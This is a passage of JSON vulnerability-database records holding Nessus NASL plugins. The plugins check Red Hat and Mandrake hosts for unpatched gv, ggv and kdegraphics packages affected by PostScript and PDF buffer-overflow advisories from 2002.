exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"ggv-1.1.0-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"gv-3.5.8-18.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"ggv-1.1.0-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"gv-3.5.8-27.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"ggv-1.1.94-2.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"gv-3.5.8-27.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"ggv-1.99.9-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"gv-3.5.8-27.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:14", "description": "Updated packages for gv, ggv, and kdegraphics fix a local buffer\noverflow when reading malformed PDF or PostScript files.\n\n[Updated 07 Jan 2003] Added fixed packages for the Itanium (IA64)\narchitecture.\n\n[Updated 06 Feb 2003] Added fixed packages for Advanced Workstation\n2.1\n\nGv and ggv are user interfaces for the Ghostscript PostScript(R)\ninterpreter used to display PostScript and PDF documents on an X\nWindow System. KGhostview is the PostScript viewer for the K Desktop\nEnvironment.\n\nZen Parse found a local buffer overflow in gv version 3.5.8 and\nearlier. An attacker can create a carefully crafted malformed PDF or\nPostScript file in such a way that when that file is viewed arbitrary\ncommands can be executed.\n\nggv and kghostview contain code derived from gv and therefore have the\nsame vulnerability.\n\nAll users of gv, ggv, and kghostview are advised to upgrade to the\nerrata packages which contain patches to correct the vulnerability.", "edition": 27, "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : ggv (RHSA-2002:211)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:kdegraphics-devel", "p-cpe:/a:redhat:enterprise_linux:ggv", "p-cpe:/a:redhat:enterprise_linux:kdegraphics", "p-cpe:/a:redhat:enterprise_linux:gv"], "id": "REDHAT-RHSA-2002-211.NASL", "href": "https://www.tenable.com/plugins/nessus/12325", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2002:211. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12325);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_xref(name:\"RHSA\", value:\"2002:211\");\n\n script_name(english:\"RHEL 2.1 : ggv (RHSA-2002:211)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for gv, ggv, and kdegraphics fix a local buffer\noverflow when reading malformed PDF or PostScript files.\n\n[Updated 07 Jan 2003] Added fixed packages for the Itanium (IA64)\narchitecture.\n\n[Updated 06 Feb 2003] Added fixed packages for Advanced Workstation\n2.1\n\nGv and ggv are user interfaces for the Ghostscript PostScript(R)\ninterpreter used to display PostScript and PDF documents on an X\nWindow System. KGhostview is the PostScript viewer for the K Desktop\nEnvironment.\n\nZen Parse found a local buffer overflow in gv version 3.5.8 and\nearlier. An attacker can create a carefully crafted malformed PDF or\nPostScript file in such a way that when that file is viewed arbitrary\ncommands can be executed.\n\nggv and kghostview contain code derived from gv and therefore have the\nsame vulnerability.\n\nAll users of gv, ggv, and kghostview are advised to upgrade to the\nerrata packages which contain patches to correct the vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2002-0838\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=103305778615625&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=103305778615625&w=2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2002:211\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ggv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdegraphics\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdegraphics-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2002:211\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ggv-1.0.2-5.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"gv-3.5.8-18.7x\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kdegraphics-2.2.2-2.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kdegraphics-devel-2.2.2-2.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ggv / gv / kdegraphics / kdegraphics-devel\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:17", "description": "A vulnerability exists in KGhostview, part of the kdegraphics package.\nIt includes a DSC 3.0 parser from GSview then is vulnerable to a\nbuffer overflow while parsing a specially crafted .ps file. It also\ncontains code from gv which is vulnerable to a similar buffer overflow\ntriggered by malformed PostScript and PDF files. This has been fixed\nin KDE 3.0.4 and patches have been applied to correct these packages.", "edition": 25, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : kdegraphics (MDKSA-2002:071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838", "CVE-2002-0836", "CVE-2002-1223"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kdegraphics-devel", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "p-cpe:/a:mandriva:linux:kdegraphics-static-devel", "p-cpe:/a:mandriva:linux:kdegraphics", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "cpe:/o:mandrakesoft:mandrake_linux:8.1"], "id": "MANDRAKE_MDKSA-2002-071.NASL", "href": "https://www.tenable.com/plugins/nessus/13971", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2002:071. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13971);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2002-0836\", \"CVE-2002-0838\", \"CVE-2002-1223\");\n script_xref(name:\"MDKSA\", value:\"2002:071\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kdegraphics (MDKSA-2002:071)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability exists in KGhostview, part of the kdegraphics package.\nIt includes a DSC 3.0 parser from GSview then is vulnerable to a\nbuffer overflow while parsing a specially crafted .ps file. It also\ncontains code from gv which is vulnerable to a similar buffer overflow\ntriggered by malformed PostScript and PDF files. This has been fixed\nin KDE 3.0.4 and patches have been applied to correct these packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20021008-1.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected kdegraphics, kdegraphics-devel and / or\nkdegraphics-static-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kdegraphics\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kdegraphics-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kdegraphics-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kdegraphics-2.2.1-2.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kdegraphics-static-devel-2.2.1-2.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kdegraphics-2.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kdegraphics-devel-2.2.2-15.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"kdegraphics-3.0.3-11.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"kdegraphics-devel-3.0.3-11.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}